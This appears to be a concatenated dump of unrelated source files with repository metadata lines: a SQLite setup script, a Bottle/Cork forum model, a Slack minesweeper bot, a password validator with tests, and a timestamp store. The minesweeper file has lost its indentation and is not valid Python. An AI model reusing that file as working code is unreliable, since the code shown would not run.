        conn.cursor().execute(create_table_sql)
    except sqlite3.Error as err:
        print(err)
def main():
    """Create the info2222.db file with its messages and replies tables.

    Idempotent: both CREATE TABLE statements use IF NOT EXISTS, so re-running
    is safe. Prints an error instead of raising when the file cannot be opened.
    """
    # Database file is created in the current working directory.
    database = r"info2222.db"
    sql_create_messages_table=""" CREATE TABLE IF NOT EXISTS messages (
                                        id integer PRIMARY KEY,
                                        from_user text NOT NULL,
                                        to_user text NOT NULL,
                                        subject text NOT NULL,
                                        body text,
                                        create_at text NOT NULL
                                    ); """
    sql_create_replies_table="""CREATE TABLE IF NOT EXISTS replies (
                                    id integer PRIMARY KEY,
                                    from_user text NOT NULL,
                                    message_id integer NOT NULL,
                                    body text,
                                    create_at text NOT NULL,
                                    FOREIGN KEY (message_id) REFERENCES messages (id)
                                );"""
    # create a database connection
    conn = create_connection(database)
    # create tables
    if conn is not None:
        # create projects table
        create_table(conn, sql_create_messages_table)
        # create tasks table
        create_table(conn, sql_create_replies_table)
    else:
        print("Error! cannot create the database connection.")
# Build the database (and its tables) when this file is run directly.
if __name__ == '__main__':
    main()
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,235 | jeffrey-lai20/Virtual-Users | refs/heads/master | /forum_test.py | import sqlite3
# One-shot smoke test: creates forum.db, seeds the FORUM table with sample
# rows and prints them back.
# NOTE(review): CREATE TABLE has no IF NOT EXISTS, so running this script a
# second time against an existing forum.db will raise — confirm that is the
# intended throwaway behaviour.
conn = sqlite3.connect('forum.db')
c = conn.cursor()
# The id/reply_id defaults build a random UUIDv4-style string from
# randomblob() hex, entirely inside SQLite.
c.execute('''CREATE TABLE FORUM
       (name TEXT NOT NULL,
       role TEXT NOT NULL,
       topic TEXT NOT NULL,
       reply TEXT NOT NULL,
       content CHAR(300) NOT NULL,
       id CHAR(36) default (lower(hex(randomblob(4))) || '-' || lower(hex(randomblob(2))) || '-4' || substr(lower(hex(randomblob(2))),2) || '-' || substr('89ab',abs(random()) % 4 + 1, 1) || substr(lower(hex(randomblob(2))),2) || '-' || lower(hex(randomblob(6)))),
       reply_id CHAR(36) default (lower(hex(randomblob(4))) || '-' || lower(hex(randomblob(2))) || '-4' || substr(lower(hex(randomblob(2))),2) || '-' || substr('89ab',abs(random()) % 4 + 1, 1) || substr(lower(hex(randomblob(2))),2) || '-' || lower(hex(randomblob(6)))));''')
conn.commit()
# Seed rows: a topic by admin, two replies, and a second topic by bob.
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
      VALUES ('admin', 'admin', 'hello dear', 'no', 'this is test')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
      VALUES ('admin', 'admin', 'hello dear', 'yes', 'this is a test reply')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
      VALUES ('bob', 'user', 'hello dear', 'yes', 'this is another test reply')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
      VALUES ('bob', 'user', 'hello another', 'no', 'this is another another test')")
conn.commit()
# Normalise line endings in content: replace carriage returns with newlines.
c.execute("update FORUM set content=REPLACE(content,X'0D',X'0A')")
conn.commit()
# Dump the seeded rows for visual inspection.
cursor = c.execute("SELECT name, role, topic, content,id ,reply_id from FORUM")
for row in cursor:
   print(row)
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,236 | jeffrey-lai20/Virtual-Users | refs/heads/master | /model.py | '''
Our Model class
This should control the actual "logic" of your website
And nicely abstracts away the program logic from your page loading
It should exist as a separate layer to any database or data structure that you might be using
Nothing here should be stateful, if it's stateful let the database handle it
'''
import view
import random
from bottle import template, redirect, static_file, request
import bottle
from beaker.middleware import SessionMiddleware
from cork import Cork
from datetime import datetime, timedelta
import logging
import json
from html import escape, unescape
# NOTE(review): `global` at module scope is a no-op; `name` simply caches the
# last username passed to login_check().
global name
name = ""
# Use users.json and roles.json in the local example_conf directory
aaa = Cork('example_conf', email_sender='federico.ceratto@gmail.com', smtp_url='smtp://smtp.magnet.ie')
# Debug-level log file shared by the whole application.
LOG_FILENAME = 'example.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
# Initialise our views, all arguments are defaults for the template
page_view = view.View()
#-----------------------------------------------------------------------------
# Current User Data
#-----------------------------------------------------------------------------
def current_user_data():
    """Return email, role and username of the authenticated user.

    Redirects to /login (via Cork) when no user is authenticated.
    """
    session = bottle.request.environ.get('beaker.session')  # touch the session; value unused
    aaa.require(fail_redirect='/login')
    user = aaa.current_user
    return {
        'user_email': user.email_addr,
        'user_role': user.role,
        'username': user.username,
    }
def all_user_data():
    """Return the full Cork user registry; requires an authenticated session."""
    session = bottle.request.environ.get('beaker.session')  # touch the session; value unused
    aaa.require(fail_redirect='/login')
    return {'users': aaa._store.users}
def user_is_anonymous():
    """Return the string 'True'/'False' (note: not a bool) for template use."""
    return 'True' if aaa.user_is_anonymous else 'False'
#-----------------------------------------------------------------------------
# Index
#-----------------------------------------------------------------------------
def index(login):
    """Render the public home page, or bounce to /login.

    :: login :: 0 shows the home page; any other value redirects to /login
    """
    if login != 0:
        return redirect("/login")
    return page_view("home", page_title="")
#-----------------------------------------------------------------------------
# Login
#-----------------------------------------------------------------------------
def login_form():
    """Show the login page, or the dashboard when already signed in."""
    if not aaa.user_is_anonymous:
        return redirect("/dashboard")
    return page_view("login", page_title="")
#-----------------------------------------------------------------------------
# Check the login credentials
def login_check(username, password):
    '''
    login_check
    Checks usernames and passwords via the Cork store.
    :: username :: The username
    :: password :: The password
    Cork performs the redirect itself: /dashboard on success, /invalid with
    a reason on failure; this function does not return a view directly.
    '''
    # check login status and user permission
    # Record the attempted username in the module-level `name` variable.
    global name
    name = username
    aaa.login(username, password, success_redirect='/dashboard', fail_redirect='/invalid?reason=Sorry,%20These%20credentials%20do%20not%20match%20our%20records.%20Please%20Check!')
#-----------------------------------------------------------------------------
# Register
#-----------------------------------------------------------------------------
def register_form():
    """Show the registration page, or the dashboard when already signed in."""
    if not aaa.user_is_anonymous:
        return redirect("/dashboard")
    return page_view("register", page_title="")
#-----------------------------------------------------------------------------
# Process a register request
def register_post(username, password, confirm_password):
    """Handle a registration form submission.

    Validates the input, creates the user with role "user" in the Cork
    store, then redirects to /login on success or to /invalid with a
    reason on any failure.

    :: username :: requested account name (must be non-empty and unused)
    :: password :: chosen password (must be non-empty)
    :: confirm_password :: must match *password*

    Note: later validation failures overwrite earlier ones, so only the
    last applicable reason is reported.
    """
    reason = ""
    if username == "" or password == "":
        reason = "Username and password could not be empty!"
    if username in aaa._store.users:
        reason = "User is already existing."
    if password != confirm_password:
        reason = "Password are not matching."
    if reason != "":
        return redirect("/invalid?reason=" + reason)
    try:
        aaa._store.users[username] = {
            "role": "user",
            "username": username,
            "hash": aaa._hash(username=username, pwd=password),
            "email_addr": "",
            "desc": "",
            "creation_date": str(datetime.utcnow()),
            "last_login": str(datetime.utcnow()),
            "muted" : 0,
        }
        aaa._store.save_users()
    except Exception as e:
        # BUG FIX: previously the reason was computed here but never shown --
        # the handler fell through and returned None (a blank response).
        # Redirect like the validation failures above so the user sees it.
        reason = 'Caught this server error: ' + repr(e)
        return redirect("/invalid?reason=" + reason)
    return redirect("/login?redirect_msg=Registered%20successfully!%20Please%20Login.")
#-----------------------------------------------------------------------------
# Invalid
#-----------------------------------------------------------------------------
def invalid(reason):
    """Render the generic error page, showing *reason* to the user."""
    return page_view("invalid", reason=reason, page_title="")
#-----------------------------------------------------------------------------
# Dashboard
#-----------------------------------------------------------------------------
def dashboard():
    """Render the dashboard for the authenticated user (login required)."""
    aaa.require(fail_redirect='/login')
    return page_view("dashboard", page_title="Dashboard", **current_user_data())
#-----------------------------------------------------------------------------
# About
#-----------------------------------------------------------------------------
def about():
    """Render the about page with a randomly chosen tagline."""
    return page_view("about", page_title="About", garble=about_garble())
#-----------------------------------------------------------------------------
# 404
#-----------------------------------------------------------------------------
def error404():
    """Render the 404 template for unknown routes."""
    return template("templates/error404")
#-----------------------------------------------------------------------------
# logout
#-----------------------------------------------------------------------------
def logout():
    """End the current session and send the user back to the home page."""
    aaa.logout(success_redirect='/home')
# Returns a random string each time
def about_garble():
    '''
    about_garble
    Pick one corporate-buzzword sentence at random for the about page.
    '''
    taglines = [
        "leverage agile frameworks to provide a robust synopsis for high level overviews.",
        "iterate approaches to corporate strategy and foster collaborative thinking to further the overall value proposition.",
        "organically grow the holistic world view of disruptive innovation via workplace diversity and empowerment.",
        "bring to the table win-win survival strategies to ensure proactive domination.",
        "ensure the end of the day advancement, a new normal that has evolved from generation X and is on the runway heading towards a streamlined cloud solution.",
        "provide user generated content in real-time will have multiple touchpoints for offshoring.",
    ]
    idx = random.randint(0, len(taglines) - 1)
    return taglines[idx]
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
def message(db):
    """Render the messaging page with the current user's sent/received
    messages and all replies attached to them (login required).

    :: db :: sqlite connection injected by the bottle-sqlite plugin
    """
    aaa.require(fail_redirect='/login')
    current_user = aaa.current_user.username
    # Messages the user sent and received, as lists of dicts.
    from_mes = query_db(db, 'SELECT * from messages where from_user=?', (current_user,))
    to_mes = query_db(db, 'SELECT * from messages where to_user=?', (current_user,))
    # Build a parameterised IN (...) list with one placeholder per id.
    # NOTE(review): with zero messages this produces "in ()" — SQLite accepts
    # an empty IN list, but other engines would not; verify if the DB changes.
    message_ids = [x["id"] for x in from_mes] + [x["id"] for x in to_mes]
    format_strings=','.join(['?'] * len(message_ids))
    r_sql = 'SELECT * FROM replies where message_id in (%s)' % format_strings
    replies = query_db(db, r_sql,
                       tuple(message_ids))
    # print('SELECT * FROM replies from message_id in (?)' % format_strings)
    # Data is passed to the template JSON-encoded for client-side rendering.
    return page_view("message", page_title = "Message", from_me_messages = json.dumps(from_mes),
                     to_me_messages = json.dumps(to_mes), replies = json.dumps(replies), **current_user_data())
def message_post(db):
    """Handle a new-message form post; returns a JSON status string.

    The response is a JSON object with 'error' (1 on failure, 0 on success)
    and a human-readable 'msg'. Validates that the recipient exists, is not
    the sender, and that all fields are filled.

    :: db :: sqlite connection injected by the bottle-sqlite plugin
    """
    result ={'error': 1}
    if aaa.user_is_anonymous:
        result['msg'] = 'Please Login!'
        return json.dumps(result)
    from_user = aaa.current_user.username
    to_user = request.forms.get('to_user')
    subject = request.forms.get('subject')
    body = request.forms.get('body')
    # simple from validation
    if (not to_user) or (not subject) or (not body):
        result['msg'] = 'Please complete the form!'
        return json.dumps(result)
    if not aaa.user(to_user):
        result['msg'] = '"To" user cannot be found! Please check.'
        return json.dumps(result)
    if to_user == from_user:
        result['msg'] = 'You cannot send message to yourself!'
        return json.dumps(result)
    # input filter for security purpose
    # repr()[1:-1] backslash-escapes quotes/control characters, then escape()
    # HTML-escapes the result — the stored text is therefore doubly encoded.
    subject=escape(repr(subject)[1:-1])
    body=escape(repr(body)[1:-1])
    try:
        # Parameterised insert — values are never interpolated into the SQL.
        db.execute(
            """INSERT INTO messages(from_user, to_user, subject, body, create_at) VALUES (?,?,?,?,?)""",
            (from_user, to_user, subject, body, datetime.now().strftime('%Y-%m-%d-%H:%M:%S')))
    except Exception as e:
        result['msg'] = 'Database error! Please contact the administrator!'
        print(e)
        return json.dumps(result)
    result['error'] = 0
    result['msg'] = 'Message has been sent successfully!'
    return json.dumps(result)
def message_delete(message_id, db):
    """Delete a message (and its replies) belonging to the current user.

    Only rows where the current user is the sender or recipient are removed.
    Returns a JSON string with 'error' (0/1) and a human-readable 'msg'.
    """
    if aaa.user_is_anonymous:
        return json.dumps({'error': 1, 'msg': 'Please Login!'})
    username = aaa.current_user.username
    try:
        db.execute(
            """DELETE FROM messages WHERE id=? AND (from_user=? OR to_user=?)""",
            (message_id, username, username,))
        db.execute(
            """DELETE FROM replies WHERE message_id=?""",
            (message_id,))
    except Exception as exc:
        print(exc)
        return json.dumps({'error': 1, 'msg': 'Database error! Please contact the administrator!'})
    return json.dumps({'error': 0, 'msg': 'Message has been deleted successfully!'})
def message_reply_post(db):
    """Handle a reply-form post for an existing message; returns JSON status.

    The response is a JSON object with 'error' (1 on failure, 0 on success)
    and a human-readable 'msg'.

    NOTE(review): unlike message_post, the msg_id from the form is not
    validated against the messages table before insertion — confirm whether
    orphan replies are acceptable.

    :: db :: sqlite connection injected by the bottle-sqlite plugin
    """
    result={'error': 1}
    if aaa.user_is_anonymous:
        result['msg'] = 'Please Login!'
        return json.dumps(result)
    current_user = aaa.current_user.username
    from_user = current_user
    body = request.forms.get('replay')
    # Same input filter as message_post: backslash-escape then HTML-escape.
    body = escape(repr(body)[1:-1])
    message_id = request.forms.get('msg_id')
    try:
        # Parameterised insert — values are never interpolated into the SQL.
        db.execute(
            """INSERT INTO replies(from_user, message_id, body, create_at) VALUES (?,?,?,?)""",
            (from_user, message_id, body, datetime.now().strftime('%Y-%m-%d-%H:%M:%S')))
    except Exception as e:
        result['msg'] = 'Database error! Please contact the administrator!'
        print(e)
        return json.dumps(result)
    result['error'] = 0
    result['msg'] = 'The Reply has been sent successfully!'
    return json.dumps(result)
def profile():
    """Render the profile template for the authenticated user."""
    aaa.require(fail_redirect='/login')
    return template("templates/profile.html", **current_user_data())
def manage_user():
    """Render the user-management page; plain 'user' role gets a 404 instead."""
    aaa.require(fail_redirect='/login')
    if aaa.current_user.role == 'user':
        return error404()
    return template("templates/manage_user.html", **all_user_data())
def reset_password():
    """Render the password-reset form for the authenticated user."""
    aaa.require(fail_redirect='/login')
    return page_view("reset_password", page_title="Reset Password", **current_user_data())
def reset_password_post(old_password, new_password, confirm_password):
    """Handle a password-change form post for the logged-in user.

    Verifies the old password against the stored Cork hash, checks the new
    passwords match, then resets the password and logs the user out. On any
    validation failure redirects to /invalid with a reason; anonymous users
    get a JSON error instead.

    NOTE(review): later checks overwrite earlier reasons, and the hash
    verification still runs even when the form was empty — confirm intended.
    """
    result ={'error': 1}
    if aaa.user_is_anonymous:
        result['msg'] = 'Please Login!'
        return json.dumps(result)
    reason = ""
    current_user = aaa.current_user
    if old_password == "" or new_password == "" or confirm_password == "": # Wrong Username
        reason = "Please complete the form!"
    # Cork may store the salted hash as str or bytes; normalise to bytes.
    salted_hash = aaa._store.users[current_user.username]["hash"]
    if hasattr(salted_hash, "encode"):
        salted_hash=salted_hash.encode("ascii")
    authenticated=aaa._verify_password(current_user.username, old_password, salted_hash)
    if not authenticated:
        reason = "Old password is not valid! Please check."
    if new_password != confirm_password:
        reason = "Password are not matching."
    if reason != "":
        return redirect("/invalid?reason=" + reason)
    try:
        """Change password"""
        # Uses Cork's internal reset-code machinery to set the new password.
        aaa.reset_password(aaa._reset_code(current_user.username, current_user.email_addr), new_password)
    except Exception as e:
        reason = 'Caught this server error: ' + repr(e)
    if reason != "":
        return redirect("/invalid?reason=" + reason)
    else:
        # Force a fresh login with the new credentials.
        return aaa.logout(success_redirect="/invalid?reason=Your%20password%20has%20been%20changed,%20please%20login%20in%20again!")
# util functions
def convert_to_json(cursor):
    """Serialize every remaining row of a DB cursor as a JSON array of
    objects keyed by column name."""
    columns = [col[0] for col in cursor.description]
    return json.dumps([dict(zip(columns, row)) for row in cursor.fetchall()])
def query_db(db, query, args=(), one=False):
    """Run *query* with *args* and return rows as dicts keyed by column name.

    :: db :: open DB-API connection
    :: query :: SQL text with ? placeholders
    :: args :: parameter tuple for the placeholders
    :: one :: when True, return only the first row (or None if no rows)
    """
    cur = db.cursor()
    cur.execute(query, args)
    columns = [col[0] for col in cur.description]
    rows = [dict(zip(columns, values)) for values in cur.fetchall()]
    if one:
        return rows[0] if rows else None
    return rows
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,237 | odasatoshi/slack-minesweeper | refs/heads/master | /plugins/minesweep.py | import random
class Minesweeper:
NULL = 0
MINE = 9
BOOM = 10
FLAG = "flag"
OPENED = True
UNOPENED = False
def __init__(self, size = 4, mineraito = 0.2):
self.init_stage(size, mineraito)
def init_stage(self, size, mineraito):
self.size = size
self.mineraito = mineraito
self.stage = [[self.NULL if random.random() > mineraito else self.MINE \
for i in range(self.size)]
for j in range(self.size)]
self.state = [[self.UNOPENED \
for i in range(self.size)]
for j in range(self.size)]
self.stage = [[self.neighbormines(i, j)
for i in range(self.size)]
for j in range(self.size)]
def remnants(self):
rem = 0
mine = 0
for i in range(self.size):
for j in range(self.size):
if ((self.state[i][j] == self.UNOPENED) or (self.state[i][j] == self.FLAG)):
rem = rem + 1
for i in range(self.size):
for j in range(self.size):
if (self.stage[i][j] == self.MINE):
mine = mine + 1
return rem - mine
# Return the number of neighbor mines.
# If self is mine, return self.MINE
def neighbormines(self, row, col):
if self.stage[row][col] == self.MINE :
return self.MINE
mines = 0
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
if self.stage[row+i][col+j] == self.MINE:
mines = mines + 1
return mines
# Return the number of neighbor flags.
def neighborflags(self, row, col):
flags = 0
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
if self.state[row+i][col+j] == self.FLAG:
flags = flags + 1
return flags
# Sweep open and unflagged neighbors.
# If sweep fails, fullopen the cell to boom the place.
def sweep_neighbors(self, row, col):
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
ret = self.sweep(row+i, col+j)
if ret == False :
self.fullopen(row+i, col+j)
return False
return True
def sweep(self, row , col):
if self.state[row][col] == self.UNOPENED :
self.state[row][col] = self.OPENED
if self.stage[row][col] == 0:
for i in range(-1, 2):
for j in range(-1, 2):
if -1 < (row + i) < self.size and -1 < (col + j) < self.size:
self.sweep(row+i, col+j)
return self.stage[row][col] != self.MINE
return True
def flag(self, row, col):
if self.state[row][col] == self.UNOPENED :
self.state[row][col] = self.FLAG
elif self.state[row][col] == self.FLAG :
self.state[row][col] = self.UNOPENED
# Sweep neighbors only when the number of neighbor flags is accurate
def left_right_click(self, row, col):
if self.state[row][col] == self.OPENED :
if self.neighborflags(row, col) == self.stage[row][col] :
return self.sweep_neighbors(row, col)
return True
def fullopen(self, row, col):
self.state = [[self.OPENED \
for i in range(self.size)]
for j in range(self.size)]
self.stage[row][col] = self.BOOM
def shaping(self, instr):
comstr = instr.replace(" ","")
row, col = comstr.split(",")
return int(row), int(col)
def generate_message(self):
mess = ""
for i in range(self.size):
for j in range(self.size):
if self.state[i][j] == self.UNOPENED :
mess = mess + ":white_square_button:"
elif self.state[i][j] == self.FLAG :
mess = mess + ":triangular_flag_on_post:"
else:
if self.stage[i][j] == 0:
mess = mess + ":white_square:"
if self.stage[i][j] == 1:
mess = mess + ":one:"
if self.stage[i][j] == 2:
mess = mess + ":two:"
if self.stage[i][j] == 3:
mess = mess + ":three:"
if self.stage[i][j] == 4:
mess = mess + ":four:"
if self.stage[i][j] == 5:
mess = mess + ":five:"
if self.stage[i][j] == 6:
mess = mess + ":six:"
if self.stage[i][j] == 7:
mess = mess + ":seven:"
if self.stage[i][j] == 8:
mess = mess + ":eight:"
if self.stage[i][j] == 9:
mess = mess + ":bomb:"
if self.stage[i][j] == 10:
mess = mess + ":boom:"
mess = mess + "\n"
return mess
def show_debug(self):
for i in range(self.size):
for j in range(self.size):
if self.state[i][j] == self.UNOPENED :
print("X",end="")
else:
print(self.stage[i][j], end="")
print("\n" ,end="")
"""
ms = Minesweeper(7, 0.1)
while 1:
ms.show_debug()
inkey = input()
row, col = ms.shaping(inkey)
if ms.sweep(row, col) == False :
ms.fullopen(row, col)
ms.show_debug()
ms = Minesweeper(7, 0.1)
"""
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,238 | odasatoshi/slack-minesweeper | refs/heads/master | /slackbot_settings.py | # coding: utf-8
DEFAULT_REPLY = "I'm a mine sweeper"
PLUGINS = ['plugins']
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,239 | odasatoshi/slack-minesweeper | refs/heads/master | /plugins/slack_sweeper.py | # coding: utf-8
from slackbot.bot import listen_to
from plugins.minesweep import Minesweeper
ms = Minesweeper(10, 0.2)
@listen_to('.*start.*')
def mention_func(message):
global ms
ms = Minesweeper(10, 0.2)
message.send(ms.generate_message())
@listen_to('^\d{1},\d{1}$')
def listen_func(message):
global ms
row, col = ms.shaping(message.body['text'])
if ms.sweep(row, col) == False :
ms.fullopen(row, col)
die(message)
message.send(ms.generate_message())
if (ms.remnants() == 0):
complete(message)
else:
message.send("あと、" + str(ms.remnants()) + "個掃除してください")
@listen_to('^f\d{1},\d{1}$')
def flag(message):
global ms
row, col = ms.shaping(message.body['text'][1:])
ms.flag(row, col)
message.send(ms.generate_message())
@listen_to('^lr\d{1},\d{1}$')
def left_right_click(message):
global ms
row, col = ms.shaping(message.body['text'][2:])
if ms.left_right_click(row, col) == False :
die(message)
message.send(ms.generate_message())
if (ms.remnants() == 0):
complete(message)
else:
message.send("あと、" + str(ms.remnants()) + "個掃除してください")
def die(message):
global ms
message.send(ms.generate_message())
message.send("あなたは死にました")
ms = Minesweeper(10, 0.2)
def complete(message):
global ms
message.send("おめでとう")
ms = Minesweeper(10, 0.2)
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,245 | trikitrok/PasswordValidatorInPython | refs/heads/master | /password_validator_tests.py | import pytest
from password_validator import PasswordValidator
@pytest.fixture
def validator():
return PasswordValidator(8)
def test_a_strong_password(validator):
assert validator.is_strong_password("#Ab3cccc") is True
def test_that_only_passwords_with_the_minimum_length_are_strong(validator):
assert validator.is_strong_password("#Ab3ccc") is False
def test_that_only_passwords_including_numbers_are_strong(validator):
assert validator.is_strong_password("#Abccccc") is False
def test_that_only_passwords_including_upper_case_letters_are_strong(validator):
assert validator.is_strong_password("#ab3cccc") is False
def test_that_only_passwords_including_lower_case_letters_are_strong(validator):
assert validator.is_strong_password("#AB3CCCC") is False
def test_that_only_passwords_including_special_characters_are_strong(validator):
assert validator.is_strong_password("cAb3cccc") is False
| {"/password_validator_tests.py": ["/password_validator.py"]} |
78,246 | trikitrok/PasswordValidatorInPython | refs/heads/master | /password_validator.py | import re
class PasswordValidator(object):
def __init__(self, minimum_length):
self.minimum_length = minimum_length
def is_strong_password(self, password):
includes_special_characters = self._includes_any(self.REQUIRED_SPECIAL_CHARACTERS, password)
includes_lower_case_letters = self._includes_any(self.LOWER_CASE_LETTERS, password)
includes_upper_case_letters = self._includes_any(self.UPPER_CASE_LETTERS, password)
includes_numbers = self._includes_any(self.NUMBERS, password)
has_minimum_length = len(password) >= self.minimum_length
return \
has_minimum_length and \
includes_numbers and \
includes_upper_case_letters and \
includes_lower_case_letters and \
includes_special_characters
@staticmethod
def _includes_any(pattern, password):
return re.search(pattern, password) is not None
REQUIRED_SPECIAL_CHARACTERS = '[%#]'
UPPER_CASE_LETTERS = '[A-Z]'
LOWER_CASE_LETTERS = '[a-z]'
NUMBERS = '[0-9]'
| {"/password_validator_tests.py": ["/password_validator.py"]} |
78,254 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /test/test_timestamp.py | import os
import tempfile
import pytest
from synchromoodle import timestamp
from synchromoodle.config import TimestampStoreConfig
@pytest.fixture(name='tmp_file')
def tmp_file():
fd, tmp_file = tempfile.mkstemp()
os.close(fd)
yield tmp_file
os.remove(tmp_file)
def test_mark(tmp_file):
ts = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file))
ts.mark("UAI1")
assert ts.get_timestamp("UAI1") == ts.now
ts.mark("UAI2")
assert ts.get_timestamp("UAI2") == ts.now
def test_read_write(tmp_file):
ts1 = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file))
ts2 = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file), now=ts1.now)
ts1.mark("UAI")
ts1.write()
ts2.read()
assert ts2.get_timestamp("UAI") == ts1.now
ts1.mark("UAI2")
ts1.write()
ts2.read()
assert ts2.get_timestamp("UAI2") == ts1.now
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,255 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/timestamp.py | """
Gestion des timestamps
"""
import datetime
import os
import re
from logging import getLogger
from typing import Dict
from synchromoodle.config import TimestampStoreConfig
date_format = '%Y%m%d%H%M%S'
log = getLogger('timestamp')
def fromisoformat(iso: str) -> datetime.datetime:
    """
    Parse a datetime given in ISO format.

    Every run of digits in the string becomes one positional field of the
    ``datetime`` constructor (year, month, day, hour, ...).

    :param iso: ISO formatted datetime string
    :return: the parsed ``datetime.datetime``
    """
    fields = (int(token) for token in re.split(r'\D', iso))
    return datetime.datetime(*fields)
class TimestampStore:
    """
    Stores, per school (UAI code), the timestamp of its last processing run.

    Lets later runs handle only the users modified since the previous
    processing of each school.
    """
    def __init__(self, config: TimestampStoreConfig, now: datetime.datetime = None):
        self.config = config
        # Freeze "now" once so every mark of this run shares the same stamp.
        self.now = now or datetime.datetime.now()
        self.timestamps = {}  # type: Dict[str, datetime.datetime]
        self.read()

    def get_timestamp(self, uai: str) -> datetime.datetime:
        """
        Return the stored timestamp of a school, or None when unknown.

        :param uai: school code
        :return: timestamp
        """
        return self.timestamps.get(uai.upper())

    def read(self):
        """
        Load the file holding the dates of the last processing runs.
        """
        self.timestamps.clear()
        try:
            with open(self.config.file, 'r') as handle:
                for raw_line in handle.readlines():
                    entry = raw_line.strip(os.linesep)
                    if not entry:
                        continue
                    # "UAI<sep>timestamp" — only the first separator splits.
                    fields = entry.split(self.config.separator, 1)
                    self.timestamps[fields[0]] = fromisoformat(fields[1])
        except IOError:
            log.warning("Impossible d'ouvrir le fichier : %s", self.config.file)

    def write(self):
        """
        Write the file holding the dates of the last processing runs.
        """
        with open(self.config.file, 'w') as handle:
            handle.writelines(uai.upper() + self.config.separator + stamp.isoformat() + os.linesep
                              for uai, stamp in self.timestamps.items())

    def mark(self, uai: str):
        """
        Record this run's timestamp for the given school.

        :param uai: school code
        """
        self.timestamps[uai.upper()] = self.now
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,256 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/__version__.py | # coding: utf-8
"""
Version module
"""
# pragma: no cover
__version__ = '1.1.4'
